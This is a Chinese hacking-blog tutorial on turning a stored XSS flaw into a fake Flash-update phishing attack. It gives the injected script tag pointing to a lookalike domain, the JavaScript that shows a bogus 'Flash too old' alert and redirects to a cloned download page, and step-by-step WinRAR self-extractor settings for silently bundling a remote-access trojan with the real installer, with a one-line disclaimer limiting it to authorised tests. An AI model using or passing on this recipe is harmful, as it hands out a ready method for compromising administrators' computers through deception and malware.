关注我们

Xss之Flash钓鱼

googxxoogoogxxoo 安全文摘 2020-04-29 10531 0
相信很多朋友都看过Xss 弹出Flash更新进行钓鱼的文章
但大多文章都是一句话概括,故此写一篇关于这方面的文章
剧情:某日xxx黑客,发现某网站存在Xss漏洞,但是有httponly,xxx黑客就想利用Xss进行钓鱼,如果只是钓到账号密码,可以去伪造登录页面,提示登录超时,这里以拿到权限为主。
先说一下Flash源码(末尾有相关工具+源码下载地址)
我已经修改为和官方一模一样,包括英文界面(左边官方页面,右边伪造页面)

Xss之Flash钓鱼

你只需要修改木马下载地址即可

Xss之Flash钓鱼

这个时候xxx黑客已经伪造好了钓鱼页面,并且购买了个flash相似的域名 — fiash.cn
紧接着黑客xxx把下面代码,插入到留言框
<script src="http://www.fiash.cn/version.js"></script>
vesrion.js:
window.alert = function(name){
var iframe = document. createElement("IFRAME");
iframe.style.display="none";
iframe.setAttribute("src",'data:text/plain,');
document. documentElement.appendChild(iframe);
window.frames [0].window.alert(name);
iframe.parentNode.removeChild(iframe);
}
alert( "您的FLASH版本过低,尝试升级后访问该页面! ");
window. location.href="http://www.hackxc.cc";
管理员日常查看留言,提示Flash页面版本过低,会跳转倒

Xss之Flash钓鱼

黑客xxx已经提前捆绑好木马,可正常安装Flash以及运行木马

下面解析木马绑定思路:
1.首选生成一个远控马,和正常的flash文件
2.接着利用WinRAR压缩文件添加压缩文件,后缀改为exe

Xss之Flash钓鱼

3.高级——>自解压选项——>解压路径:C:\windows\temp

Xss之Flash钓鱼

4.高级——>自解压选项——>安装——>解压后运行
C:\windows\temp\qq.exe
C:\windows\temp\flashplayer_install_cn.exe

Xss之Flash钓鱼

5.高级——>自解压选项——>模式——>隐藏所有
6.高级——>自解压选项——>更新
                                    更新方式——>解压并更新文件
                                    覆盖方式——>覆盖所有文件
7.保存后,生成exe,点击后会解压文件,然后执行
8.由于还不太像,我们需要修改文件的图标,属性等等,高仿flash
利用工具:ResourceHacker,在此就不介绍如何替换图标了
9.替换图标后运行文件,自动解压并且运行,

Xss之Flash钓鱼


回到剧情,此时管理员已经上线,这个时候我们就可以把version.js改一个名称,这样网站就无法加载了。至此已经拿到管理员PC权限,此方法适用于已授权的渗透测试、红队评估、攻防演练,请勿用于其他非法途径。

最后为了确保上线几率,可以再写个txt放进去进行欺骗  哈哈

Xss之Flash钓鱼

大小 : 3 MB |  下载量 : 24 次 |  文件类型 : 压缩文件  

文由http://www.hackxc.cc

版权声明

本文仅代表作者观点,不代表黑白网立场。
如文章侵犯了您的权利,请通过邮箱联系我们删除。
详情查看:版权纠纷
E-Mail:server@heibai.org

喜欢0发布评论

评论列表

发表评论

  • 昵称(必填)
  • 邮箱
  • 网址